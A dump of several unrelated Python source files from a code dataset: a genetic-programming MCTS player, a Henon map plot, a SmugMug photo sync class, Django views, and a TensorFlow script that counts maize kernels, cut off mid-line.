prims[6], prims[3], prims[2], terminals[3], prims[5], terminals[2], terminals[1]]\r\n UCT_GP_Tree = creator.Individual(UCT_formula)\r\n \r\n # if MCTS already has a gpTree, return the values for each child\r\n if hasGPTree:\r\n playerSymbol = state.playerSymbol\r\n nodeValues = [[c.Q, c.visits, RootNode.visits, c_param] for c in RootNode.child]\r\n func = toolbox.compile(expr=GPTree)\r\n values = [func(Q,n,N,c) for Q,n,N,c in nodeValues]\r\n #print(\"(GPSeacrh - Returning optimal child\")\r\n if playerSymbol == 1:\r\n return RootNode.child[np.argmax(values)]\r\n else:\r\n return RootNode.child[np.argmin(values)]\r\n \r\n # else, find the optimal tree using GP \r\n else:\r\n \r\n MU, LAMBDA, NGEN = 1, 4, 20\r\n pop = [UCT_GP_Tree] # one formula in tree\r\n hof = tools.HallOfFame(1)\r\n \r\n stats_fit = tools.Statistics(lambda ind: ind.fitness.values)\r\n stats_size = tools.Statistics(len)\r\n mstats = tools.MultiStatistics(fitness=stats_fit, size=stats_size)\r\n mstats.register(\"avg\", np.mean)\r\n mstats.register(\"std\", np.std)\r\n mstats.register(\"min\", np.min)\r\n mstats.register(\"max\", np.max)\r\n \r\n pop, logbook = eaMuCommaLambdaCustom(pop, toolbox, mu=MU, lambda_=LAMBDA, \r\n cxpb=0, mutpb=1, ngen=NGEN, stats=mstats, halloffame=hof, verbose=False)\r\n # return the best tree\r\n #print(\"(GPSeacrh) - Returning best tree\")\r\n #print(str(hof[0]))\r\n return hof[0]\r\n \r\n \r\n\r\ndef eaMuCommaLambdaCustom(population, toolbox, mu, lambda_, cxpb, mutpb, ngen,\r\n stats=None, halloffame=None, verbose=__debug__):\r\n \"\"\"\r\n This is the :math:`(\\mu~,~\\lambda)` evolutionary algorithm\r\n \"\"\"\r\n assert lambda_ >= mu, \"lambda must be greater or equal to mu.\"\r\n\r\n # Evaluate the individuals with an invalid fitness\r\n invalid_ind = [ind for ind in population if not ind.fitness.valid]\r\n fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)\r\n for ind, fit in zip(invalid_ind, fitnesses):\r\n ind.fitness.values = fit\r\n\r\n if halloffame is not None:\r\n halloffame.update(population)\r\n\r\n logbook = tools.Logbook()\r\n logbook.header = ['gen', 'nevals'] + (stats.fields if stats else [])\r\n\r\n record = stats.compile(population) if stats is not None else {}\r\n logbook.record(gen=0, nevals=len(invalid_ind), **record)\r\n if verbose:\r\n print(logbook.stream)\r\n\r\n # Begin the generational process\r\n for gen in range(1, ngen + 1):\r\n # Vary the population\r\n offspring = varOr(population, toolbox, lambda_, cxpb, mutpb)\r\n\r\n # Evaluate the individuals with an invalid fitness\r\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\r\n fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)\r\n \r\n for ind, fit in zip(invalid_ind, fitnesses):\r\n ind.fitness.values = fit\r\n\r\n # Update the hall of fame with the generated individuals\r\n if halloffame is not None:\r\n halloffame.update(offspring)\r\n\r\n # Select the next generation population\r\n population[:] = toolbox.select(population + offspring, mu)\r\n #print(\"Best individual is %s, %s\" % (population[0], population[0].fitness.values))\r\n\r\n # Update the statistics with the new population\r\n record = stats.compile(population) if stats is not None else {}\r\n logbook.record(gen=gen, nevals=len(invalid_ind), **record)\r\n if verbose:\r\n print(logbook.stream)\r\n return population, logbook\r\n\r\n\r\ndef semanticsDistance(original, new):\r\n return sum((np.absolute(np.subtract(original.vector, new.vector))/len(new.vector)))\r\n\r\n\r\ndef selBestCustom(individuals, fit_attr=\"fitness\"):\r\n for i in individuals:\r\n i.SD = round(semanticsDistance(individuals[0], i), 3)\r\n \"\"\"\r\n ind_sorted = sorted(\r\n sorted(individuals, key=attrgetter(\"SD\"), reverse=True), \r\n key=attrgetter(\"fitness\"), reverse=True\r\n )\r\n \"\"\"\r\n ind_sorted = sorted(individuals, key=attrgetter(\"fitness\"), reverse=True)\r\n \r\n return ind_sorted[:1]\r\n \r\n\r\n\r\ndef varOr(population, toolbox, lambda_, cxpb, mutpb):\r\n \"\"\"\r\n Part of an evolutionary algorithm applying only the variation part\r\n (crossover, mutation **or** reproduction). The modified individuals have\r\n their fitness invalidated. The individuals are cloned so returned\r\n population is independent of the input population.\r\n \"\"\"\r\n assert (cxpb + mutpb) <= 1.0, (\r\n \"The sum of the crossover and mutation probabilities must be smaller \"\r\n \"or equal to 1.0.\")\r\n\r\n offspring = []\r\n for _ in range(lambda_):\r\n ind = toolbox.clone(random.choice(population))\r\n ind, = toolbox.mutate(ind)\r\n # make sure it's a new program\r\n while(ind == population[0]):\r\n ind, = toolbox.mutate(ind)\r\n del ind.fitness.values\r\n offspring.append(ind)\r\n \r\n return offspring\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"MCTS_TREE_ES_Player.py","file_name":"MCTS_TREE_ES_Player.py","file_ext":"py","file_size_in_byte":19120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"177160499","text":"import matplotlib.pyplot as plt\r\n\r\n\r\ndef henon(a=1.4,b=0.3,x=0.2,y=0.2):\r\n global lx,ly\r\n\r\n for i in range(1,3000):\r\n xnew = 1+y-a*x**2\r\n ynew = b*x\r\n #print(i,xnew,ynew)\r\n lx.append(xnew)\r\n ly.append(ynew)\r\n \r\n x =xnew\r\n y =ynew\r\n \r\n \r\n# initalize lists for plotting\r\nlx = []\r\nly = []\r\n\r\n#henon(0.8,0.3,0.2,0.2) #henon(a,b,x,y)\r\nhenon()\r\n\r\nplt.scatter(lx,ly, marker=\".\", alpha=0.2)\r\nplt.show()","sub_path":"henonFunction.py","file_name":"henonFunction.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280115366","text":"import os\nimport requests\nfrom datetime import datetime\nfrom scanner import POLICY_DISK_RULES\nfrom scanner.objects import SyncObject, logger\nfrom scanner.picasa import PicasaDB\n\n\nclass Image(SyncObject):\n def __init__(self, scanner, obj_id, smugmug_id=None, disk_path=None, picasa_caption=None, smugmug_caption=None):\n super(Image, self).__init__(scanner, obj_id, smugmug_id, disk_path)\n self.original_url = None\n self.picasa_caption = picasa_caption\n self.smugmug_caption = smugmug_caption\n self.duplicated_images = []\n\n @staticmethod\n def create_from_disk(scanner, folder, name, developed_path=None):\n \"\"\"\n :type scanner: scan.Scanner\n \"\"\"\n image_disk_path = os.path.join(folder, name)\n image_id = SyncObject.path_to_id(scanner.base_dir, image_disk_path)\n picasa_caption = PicasaDB.instance().get_image_caption(folder, name)\n\n # Now check if there is a developed version of this image. If there is, take its path instead of the original\n if developed_path:\n developed_version = os.path.join(developed_path, name)\n if os.path.exists(developed_version):\n image_disk_path = developed_version\n\n return Image(scanner, image_id, disk_path=image_disk_path, picasa_caption=picasa_caption)\n\n @staticmethod\n def create_from_smugmug(scanner, image_id, image):\n \"\"\" :type scanner: scan.Scanner \"\"\"\n i = Image(scanner, image_id)\n i.update_from_smugmug(image)\n return i\n\n def update_from_smugmug(self, image):\n last_update = datetime.strptime(image['LastUpdated'], '%Y-%m-%d %H:%M:%S')\n if self.smugmug_id is None:\n self.smugmug_id = image['id']\n self.original_url = image['OriginalURL']\n self.online_last_updated = last_update\n self.smugmug_caption = image['Caption']\n else:\n # Duplicated image on SmugMug!!! Delete older version\n self.duplicated_images.append(image['id'])\n logger.info('Duplicated image on SmugMug!!! Delete older version %s' % self.id)\n\n def needs_sync(self):\n # Check for upload, download, delete, metadata change\n return super(Image, self).needs_sync() or self._metadata_needs_sync() or len(self.duplicated_images) > 0\n\n def sync(self, policy):\n if not self.on_smugmug():\n self._upload()\n\n if not self.on_disk():\n if policy == POLICY_DISK_RULES:\n # Delete the online version (as this was deleted from the disk)\n logger.debug('--- Deleting image %s (%d)' % (self.id, self.smugmug_id))\n self.smugmug.images_delete(ImageID=self.smugmug_id)\n self.smugmug_id = None\n else:\n # Download the file to disk\n self._download()\n\n if self._metadata_needs_sync() and self.smugmug_id:\n # TODO: This is not getting called yet...\n logger.debug('--- Updating image\\'s caption %s to %s' % (self, self.picasa_caption))\n self.smugmug.images_changeSettings(ImageID=self.smugmug_id, Caption=self.picasa_caption)\n\n if len(self.duplicated_images) > 0:\n # Delete from online any duplicates of this photo (duplicates are identified by file name)\n for smugmug_id in self.duplicated_images:\n logger.debug('--- Deleting duplicated image %d' % smugmug_id)\n self.smugmug.images_delete(ImageID=smugmug_id)\n\n self.duplicated_images = []\n\n def _upload(self):\n upload = True\n\n # Check if an upload is needed...\n if self.online_last_updated:\n disk_last_updated = datetime.fromtimestamp(os.path.getmtime(self.disk_path))\n upload = disk_last_updated > self.online_last_updated\n\n if upload:\n # Need to delete existing images that need update\n if self.on_smugmug():\n logger.debug('--- Deleting image (for replacement) %s' % self.id)\n self.smugmug.images_delete(ImageID=self.smugmug_id)\n self.smugmug_id = None\n\n logger.debug('--- Uploading image %s' % self)\n self.smugmug.images_upload(File=self.disk_path, AlbumID=self.get_parent_smugmug_id())\n\n def _metadata_needs_sync(self):\n # TODO: Not working!!!\n if self.picasa_caption and self.picasa_caption != self.smugmug_caption:\n return True\n\n # TODO: Add check for other meta-data attributes here...\n return False\n\n def _download(self):\n self.disk_path = SyncObject.id_to_path(self.scanner.base_dir, self.id)\n r = requests.get(self.original_url)\n with open(self.disk_path, 'wb') as f:\n for chunk in r.iter_content(chunk_size=512 * 1024):\n # filter out keep-alive new chunks\n if chunk:\n f.write(chunk)\n\n @staticmethod\n def is_image(f):\n _, ext = os.path.splitext(f)\n # Unknown file types: '.3gp',\n return ext.lower() in ['.jpg', '.jpeg', '.avi', '.mv4', '.mov', '.mp4', '.mts']\n","sub_path":"scanner/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"131204009","text":"from django.shortcuts import render\n\n# Create your views here.\nimport json\nfrom django.shortcuts import render_to_response ,redirect , render\n\nrest_list = []\n'''\ndef parseFIle(filename):\n file = open(\"Phone.json\", \"r\")\n phones = json.load(file);\n print (phones)\n for i in phones:\n phone_list.append(Phone().parseFromDict(i))\n file.close()\n print(phone_list)\nparseFIle(\"Phone.json\")\n'''\n\ndef getJson(request):\n file = open(\"Restaurants.json\", \"r\")\n print(\"Error\")\n rest = json.load(file)\n return rest\n\ndef show(request):\n rest = getJson(\"Restaurants.json\")\n return render( request , \"all.html\" , {'rest': rest})\n\ndef get(request , path):\n rests = getJson(\"Restaurants.json\")\n rest = {}\n for i in rests:\n if i['id'] == int(path):\n rest = i\n break\n return render(request , \"restaurant.html\" , {'rest': rest})\n","sub_path":"courses/OWP/lab3/lab3/restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"462067125","text":"#!/usr/bin/env python3\n\n#########################################################\n# EarVision\n#\n# Copyright 2020\n#\n# Cedar Warman\n# Michaela E. Buchanan\n# Christopher M. Sullivan\n# Justin Preece\n# Pankaj Jaiswal\n# John Folwer\n# \n#\n# Department of Botany and Plant Pathology\n# Center for Genome Research and Biocomputing\n# Oregon State University\n# Corvallis, OR 97331\n#\n# fowlerj@science.oregonstate.edu\n#\n# This program is not free software; you can not redistribute it and/or\n# modify it at all.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n#\n#########################################################\n\n\"\"\"\nThis version will impliment overlap in image subdivisions and non-maximum\nsuppression. Eventually it will replace the other version, but for now there\nare two in case I break this one.\n\ntensorflow_predict.py\nAdapted from:\nhttps://colab.research.google.com/github/Tony607/object_detection_demo/blob/master/tensorflow_object_detection_training_colab.ipynb#scrollTo=mz1gX19GlVW7\n\nUsage (note: I've been running this on a Nvidia GPU with Tensorflow 1.12-GPU \nin a conda virtual environment):\n\nbash; conda activate tf1.12-gpu; python tensorflow_predict.py \n -c \n -l \n -d \n -o \n -m \n -s \n -n \n\"\"\"\n\nimport os\nimport glob\n\nimport numpy as np\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport csv\nimport argparse\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nimport pyfiglet\n\n# Setting up arguments\nparser = argparse.ArgumentParser(description='Splits labels')\nparser.add_argument('-d',\n '--test_image_dir',\n type=str,\n help=('Path to test image directory'),\n required=True)\nparser.add_argument('-c', \n '--checkpoint',\n type=str,\n default='./data/default_checks/model.ckpt-50000',\n help=('Path to frozen detection graph (checkpoint)'))\nparser.add_argument('-l',\n '--labels',\n type=str,\n default='./utils/training/data/label_map.pbtxt',\n help=('Path to class label map'))\nparser.add_argument('-o',\n '--output_path',\n type=str,\n default='./output/inference',\n help=('Path to output directory'))\nparser.add_argument('-m',\n '--model_path',\n type=str,\n default='./seed_models/research/',\n help=('Path to object detection model directory'))\nparser.add_argument('-s',\n '--min_score_threshold',\n type=float,\n default=0.05,\n help=('Minimum score threshold for plotting bounding boxes'))\nparser.add_argument('-n',\n '--image_split_num',\n type=int,\n default=1,\n help=('Number of image subdivisions to run the object detection on.'))\nparser.add_argument('-w',\n '--overlap_width',\n type=int,\n default=100,\n help=('Pixel overlap width for image subdivisions.'))\nargs = parser.parse_args()\n\n\"\"\" \nSetting up environmental variables for object detection model\n\"\"\"\n\n# handle / on input path\nnewPath = args.model_path\n\nif newPath[0] == '/':\n newPath = newPath[1:]\n\nnetsPath = newPath + \"/tf_slim\"\n\n# create new path\nsys.path.append(newPath) \nsys.path.append(netsPath)\n\n\"\"\"\nPretty banner \n\"\"\"\n\nascii_banner = pyfiglet.figlet_format(\"Seed Project Inference Tool\")\nprint(ascii_banner)\n\nfrom object_detection.utils import ops as utils_ops\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\n\n# for exporting model \n\nimport tensorflow as tf\nfrom google.protobuf import text_format\nfrom object_detection import exporter\nfrom object_detection.protos import pipeline_pb2\nslim = tf.contrib.slim\n\n# export model \n\npipeline_config = pipeline_pb2.TrainEvalPipelineConfig()\nwith tf.gfile.GFile(\"./utils/training/train.config\", 'r') as f:\n text_format.Merge(f.read(), pipeline_config)\n# text_format.Merge(FLAGS.config_override, \"./utils/training/train.config\")\n# if input_shape:\n# input_shape = [\n# int(dim) if dim != '-1' else None\n# for dim in FLAGS.input_shape.split(',')\n# ]\n# else:\ninput_shape = None\nexporter.export_inference_graph(\n \"image_tensor\", pipeline_config, args.checkpoint,\n args.output_path, input_shape=input_shape)\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = \"./output/inference/frozen_inference_graph.pb\"\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = args.labels\n\n# If you want to test the code with your images, just add images files to the PATH_TO_TEST_IMAGES_DIR.\nPATH_TO_TEST_IMAGES_DIR = args.test_image_dir\n\nassert os.path.isfile(PATH_TO_CKPT)\nassert os.path.isfile(PATH_TO_LABELS)\nTEST_IMAGE_PATHS = glob.glob(os.path.join(PATH_TO_TEST_IMAGES_DIR, \"*.*\"))\nassert len(TEST_IMAGE_PATHS) > 0, 'No image found in `{}`.'.format(PATH_TO_TEST_IMAGES_DIR)\n\n# Importing the frozen inference graph\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(\n label_map, max_num_classes=2, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\n# Loading the images\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n print(im_width)\n print(im_height)\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n# Size, in inches, of the output images.\nIMAGE_SIZE = (12, 8)\n\n# A really complicated fuction to get the split sections, with overlap\ndef get_splits(image_width, split_number, overlap):\n\n image_splits = []\n total_image_width = image_width\n overlap_width = overlap\n\n if args.image_split_num == 1:\n image_splits.append([0, total_image_width]) \n\n # This will be the most used case, as of now, with a split of 3 sub-images.\n # In this case, since a lot of the ear images have significant space on the\n # left and right, I want the center sub-image to not be too big. To avoid\n # this, I'll do the overlaps from the left and right images and leave the\n # center image unchanged.` \n elif args.image_split_num == 3:\n # Here's the split width if there's no overlap (note: probably will\n # need to do something about rounding errors here with certain image\n # widths).\n no_overlap_width = int(total_image_width / split_number)\n \n # Left split. The left side of the left split will always be zero.\n left_split = []\n left_split.append(0)\n\n # The other side of the left split will be the width (minus 1 to fix\n # the 0 index start) plus the overlap\n left_split.append(no_overlap_width + overlap_width)\n image_splits.append(left_split)\n\n # The middle has no overlap in this case\n middle_split = []\n middle_split.append(no_overlap_width)\n middle_split.append(no_overlap_width * 2)\n image_splits.append(middle_split)\n\n # The right split is the opposite of the left split\n right_split = []\n right_split.append((2 * no_overlap_width) - overlap_width)\n right_split.append(total_image_width)\n image_splits.append(right_split)\n\n else:\n # If the split is not 1 or 3, this more general overlap setup happens,\n # with overlaps on all boundaries.\n no_overlap_width = int(total_image_width / split_number)\n\n # Left split\n left_split = []\n left_split.append(0)\n left_split.append(no_overlap_width + overlap_width)\n image_splits.append(left_split)\n\n # Middle splits (the minus 2 is because the left and right sides are\n # handled separately)\n for split_position in range(1, (split_number - 1)): \n middle_split = []\n left_middle_split = (no_overlap_width * split_position) - overlap_width\n right_middle_split = (no_overlap_width * (split_position + 1)) + overlap_width\n middle_split.append(left_middle_split)\n middle_split.append(right_middle_split)\n image_splits.append(middle_split)\n\n # Right split\n right_split = []\n right_split.append((no_overlap_width * (split_number - 1)) - overlap_width)\n right_split.append(total_image_width)\n image_splits.append(right_split)\n\n return(image_splits)\n \n\n# The fuction that actually splits the images\ndef split_image(image_np_array, split_list):\n print(image_np_array.shape)\n array_list = []\n\n for split_nums in split_list:\n left_border = int(split_nums[0])\n right_border = int(split_nums[1])\n print(\"Borders:\")\n print(left_border)\n print(right_border)\n sub_array = image_np_array[:,left_border:right_border,:]\n array_list.append(sub_array)\n\n return(array_list)\n\n\ndef run_inference_for_single_image(image, graph):\n with graph.as_default():\n with tf.Session() as sess:\n # Get handles to input and output tensors\n ops = tf.get_default_graph().get_operations()\n all_tensor_names = {\n output.name for op in ops for output in op.outputs}\n tensor_dict = {}\n for key in [\n 'num_detections', 'detection_boxes', 'detection_scores',\n 'detection_classes', 'detection_masks'\n ]:\n tensor_name = key + ':0'\n if tensor_name in all_tensor_names:\n tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n tensor_name)\n if 'detection_masks' in tensor_dict:\n # The following processing is only for single image\n detection_boxes = tf.squeeze(\n tensor_dict['detection_boxes'], [0])\n detection_masks = tf.squeeze(\n tensor_dict['detection_masks'], [0])\n # Reframe is required to translate mask from box coordinates \n # to image coordinates and fit the image size.\n real_num_detection = tf.cast(\n tensor_dict['num_detections'][0], tf.int32)\n detection_boxes = tf.slice(detection_boxes, [0, 0], [\n real_num_detection, -1])\n detection_masks = tf.slice(detection_masks, [0, 0, 0], [\n real_num_detection, -1, -1])\n detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n detection_masks, detection_boxes, image.shape[0], image.shape[1])\n detection_masks_reframed = tf.cast(\n tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n # Follow the convention by adding back the batch dimension\n tensor_dict['detection_masks'] = tf.expand_dims(\n detection_masks_reframed, 0)\n image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n # Run inference\n output_dict = sess.run(tensor_dict,\n feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(\n output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.uint8)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks'][0]\n return output_dict\n\n# This function is for getting out the total number of fluorescent and\n# nonfluorescent boxes detected from an output_dict. \ndef get_object_counts(output_dict, min_score):\n detection_classes = output_dict['detection_classes']\n detection_scores = output_dict['detection_scores']\n\n total_fluorescent = 0\n total_nonfluorescent = 0\n\n for i in range(len(detection_scores)):\n detect_class = detection_classes[i]\n detect_score = detection_scores[i]\n if detect_score > min_score:\n if detect_class == 1:\n total_fluorescent = total_fluorescent + 1\n if detect_class == 2:\n total_nonfluorescent = total_nonfluorescent + 1\n\n output_list = [total_fluorescent, total_nonfluorescent]\n return(output_list)\n\n# This function is for saving a file with more detailed information about the\n# bounding boxes and confidence scores\ndef get_boxes_and_scores(output_dict, image_name_string):\n image_name = image_name_string\n detection_boxes = output_dict['detection_boxes']\n detection_scores = output_dict['detection_scores']\n detection_classes = output_dict['detection_classes']\n\n x_min_list = []\n x_max_list = []\n y_min_list = []\n y_max_list = []\n score_list = []\n class_list = []\n name_list = []\n\n for i in range(len(detection_scores)):\n x_min = detection_boxes[i][1]\n x_max = detection_boxes[i][3]\n y_min = detection_boxes[i][0]\n y_max = detection_boxes[i][2]\n score = detection_scores[i]\n class_num = detection_classes[i]\n\n x_min_list.append(x_min)\n x_max_list.append(x_max)\n y_min_list.append(y_min)\n y_max_list.append(y_max)\n score_list.append(score)\n class_list.append(class_num)\n name_list.append(image_name)\n\n output_list = [x_min_list,\n x_max_list,\n y_min_list,\n y_max_list,\n score_list,\n class_list,\n name_list]\n\n return(output_list)\n \n\n# This function removes the boxes that are near the edges of the splits, in an\n# attempt to remove boxes that are only a fraction of a seed.\ndef remove_edge_boxes(output_dict, list_of_splits, image_position):\n output_dict_boxes_removed = output_dict\n # This is how close the edge of a box can be to the edge of the sub-image\n # before they get deleted\n edge_crop_width = 40\n image_width = list_of_splits[-1][1]\n relative_edge_crop_width = edge_crop_width / image_width\n #print(\"relative_edge_crop_width is: \")\n #print(relative_edge_crop_width)\n\n array_counter = 0\n delete_list = []\n\n # Pulling out the elements of the output_dict that will get modified\n adjusted_boxes = output_dict['detection_boxes']\n adjusted_scores = output_dict['detection_scores']\n adjusted_classes = output_dict['detection_classes']\n\n # On the leftmost set of boxes, only ones near the right side will be\n # deleted\n if image_position == 0:\n print(\"\\n\\nleft image\")\n for box in adjusted_boxes:\n xmax = box[3] \n if xmax > (1 - relative_edge_crop_width):\n # Adding the index to the list of indexes to be deleted\n delete_list.append(array_counter)\n array_counter += 1\n print(len(delete_list))\n \n adjusted_boxes = np.delete(adjusted_boxes, delete_list, 0)\n adjusted_scores = np.delete(adjusted_scores, delete_list, 0)\n adjusted_classes = np.delete(adjusted_classes, delete_list, 0)\n\n # Rightmost set\n elif image_position == (len(list_of_splits) - 1):\n print(\"\\n\\nright image\")\n for box in adjusted_boxes:\n xmin = box[1] \n if xmin < relative_edge_crop_width:\n # Adding the index to the list of indexes to be deleted\n delete_list.append(array_counter)\n array_counter += 1\n print(len(delete_list))\n \n adjusted_boxes = np.delete(adjusted_boxes, delete_list, 0)\n adjusted_scores = np.delete(adjusted_scores, delete_list, 0)\n adjusted_classes = np.delete(adjusted_classes, delete_list, 0)\n\n # All the middle sets\n else:\n print(\"\\n\\nmiddle image\")\n for box in adjusted_boxes:\n xmax = box[3] \n xmin = box[1] \n if (xmin < relative_edge_crop_width) or (xmax > (1 - relative_edge_crop_width)):\n # Adding the index to the list of indexes to be deleted\n delete_list.append(array_counter)\n array_counter += 1\n print(len(delete_list))\n \n adjusted_boxes = np.delete(adjusted_boxes, delete_list, 0)\n adjusted_scores = np.delete(adjusted_scores, delete_list, 0)\n adjusted_classes = np.delete(adjusted_classes, delete_list, 0)\n \n # Adding the modified arrays back into the output_dict\n print(\"Original array length: \")\n print(output_dict_boxes_removed['detection_boxes'].shape[0])\n\n output_dict_boxes_removed['detection_boxes'] = adjusted_boxes\n output_dict_boxes_removed['detection_scores'] = adjusted_scores\n output_dict_boxes_removed['detection_classes'] = adjusted_classes\n output_dict_boxes_removed['num_detections'] = adjusted_boxes.shape[0]\n\n print(\"Modified array length: \")\n print(output_dict_boxes_removed['detection_boxes'].shape[0])\n\n return(output_dict_boxes_removed)\n\n\n# This function fixes the relative coordinates when splitting an image into\n# multiple subimages\ndef fix_relative_coord(output_dict, list_of_splits, image_position):\n output_dict_adj = output_dict\n\n # Getting the image width out of the list of splits (it's the right side of\n # the last split).\n image_width = list_of_splits[-1][1]\n\n # Getting the split width\n split_width = list_of_splits[image_position][1] - list_of_splits[image_position][0]\n\n # First we get a constant adjustment for the \"image position\". The\n # adjustment is where the left side of the current image starts, relative\n # to the entire image. We can get this from the list_of_splits.\n position_adjustment = list_of_splits[image_position][0] / image_width\n\n # Now we adjust the x coordinates of the 'detection_boxes' ndarray, We\n # don't need to adjust the y coordinates because we only split on the x. If\n # later I add splitting on y, then the y coordinates need to be adjusted.\n # This adjustment \"shrinks\" the relative coordinates down.\n adjusted_boxes = output_dict['detection_boxes']\n adjusted_boxes[:,[1,3]] *= (split_width / image_width)\n\n # Adding the adjustment for which split image it is (the first image\n # doesn't need adjustment, hence the if statement).\n if image_position > 0:\n adjusted_boxes[:,[1,3]] += position_adjustment\n \n\n # Now adding back in the adjusted boxes to the original ndarray\n output_dict_adj['detection_boxes'] = adjusted_boxes\n\n return(output_dict_adj)\n\n\n# Non-max suppression function\ndef do_non_max_suppression(input_dictionary):\n # The actual nms comes from Tensorflow\n nms_vec = tf.image.non_max_suppression(\n input_dictionary['detection_boxes'],\n input_dictionary['detection_scores'],\n 100000,\n iou_threshold=0.5,\n score_threshold=float('-inf'),\n name=None)\n\n # Converting into a ndarray\n nms_vec_ndarray = tf.Session().run(nms_vec)\n\n print(\"\\n\\n\\nthe nms tensor is:\")\n print(nms_vec)\n print(\"the nms ndarray is:\")\n print(nms_vec_ndarray)\n print(len(nms_vec_ndarray))\n print(\"the length of the input array is:\")\n print(len(output_dict['detection_boxes']))\n print(\"\\n\\n\\n\")\n\n # Indexing the input dictionary with the output of non_max_suppression,\n # which is the list of boxes (and score, class) to keep.\n out_dic = input_dictionary.copy()\n out_dic['detection_boxes'] = input_dictionary['detection_boxes'][nms_vec_ndarray].copy() \n out_dic['detection_scores'] = input_dictionary['detection_scores'][nms_vec_ndarray].copy() \n out_dic['detection_classes'] = input_dictionary['detection_classes'][nms_vec_ndarray].copy() \n\n # Change to output dictionary\n return(out_dic)\n\n# Function for deleting boxes that are unrealistically large.\ndef delete_giant_boxes(input_dictionary, list_of_splits):\n image_width = list_of_splits[-1][1]\n x_box_max = 300\n rel_x_box_max = x_box_max / image_width\n y_box_max = 400\n rel_y_box_max = y_box_max / image_width\n coord_list = input_dictionary['detection_boxes']\n coord_counter = 0\n delete_list = []\n\n for coord in coord_list:\n xmin = coord[1]\n xmax = coord[3]\n x = xmax - xmin\n\n ymin = coord[0]\n ymax = coord[2]\n y = ymax - ymin\n\n if (x > rel_x_box_max) or (y > rel_y_box_max):\n delete_list.append(coord_counter)\n \n\n coord_counter += 1\n\n # Deleting the boxes that are too big\n print(\"Number of unreasonably large boxes deleted:\")\n print(len(delete_list))\n print(\"\\n\")\n out_dic = input_dictionary.copy()\n\n if len(delete_list) > 0:\n print(\"deleting boxes in original dict\")\n out_dic['detection_boxes'] = np.delete(input_dictionary['detection_boxes'], delete_list, 0) \n out_dic['detection_classes'] = np.delete(input_dictionary['detection_classes'], delete_list, 0) \n out_dic['detection_scores'] = np.delete(input_dictionary['detection_scores'], delete_list, 0) \n\n return(out_dic)\n\n# Setting some stuff up for the totals\nimage_names = list()\nfluorescent_totals = list()\nnonfluorescent_totals = list()\n\n# Setting up a list for the detailed output\ndetailed_results = [[\"x_min\"], [\"x_max\"], \n [\"y_min\"], [\"y_max\"], \n [\"score\"], [\"class\"], [\"name\"]]\n\n# Main basically\nfor image_path in TEST_IMAGE_PATHS:\n # Sets the image position counter for the relative coordinate fix\n image_position_counter = 0\n\n image = Image.open(image_path)\n image_name_string = str(os.path.splitext(os.path.basename(image_path))[0])\n print('\\nprocessing ' + image_name_string + '\\n')\n # the array based representation of the image will be used later in order to prepare the\n # result image with boxes and labels on it.\n image_np = load_image_into_numpy_array(image)\n\n # Here we set up the image splits, based on the users desired number of\n # sub-images, including the overlap. The splits will be a list of sets of\n # two numbers, the lower and upper bounds of the splits.\n splits = get_splits(image_np.shape[1], args.image_split_num, args.overlap_width)\n print(splits)\n \n # Here's where the actual splitting happens\n #split_image_np = np.array_split(image_np, args.image_split_num, axis=1)\n split_image_np = split_image(image_np, splits)\n print(\"\\nThe split image array list looks like:\")\n for array in split_image_np:\n print(array.shape)\n \n # Running the inference for the first split, or in the case of a split number\n # of 1, the only split.\n output_dict = run_inference_for_single_image(split_image_np[0], detection_graph)\n \n if args.image_split_num > 1:\n # Getting rid of edge boxes for the first split image\n output_dict = remove_edge_boxes(\n output_dict, \n splits,\n image_position_counter)\n\n # Fixing the relative coordinates for the first split image\n output_dict = fix_relative_coord(\n output_dict, \n splits, \n image_position_counter)\n\n image_position_counter = image_position_counter + 1\n\n # Inference for the following splits, if there's more than 1.\n if args.image_split_num > 1:\n # Fixing the relative coordinates for the first image\n \n\n # Goes through the image sub-arrays, skipping the first one since we\n # already did that one and the new data will be appended to it.\n for image_split in split_image_np[1:]:\n print(\"\\nProcessing split image. Image position 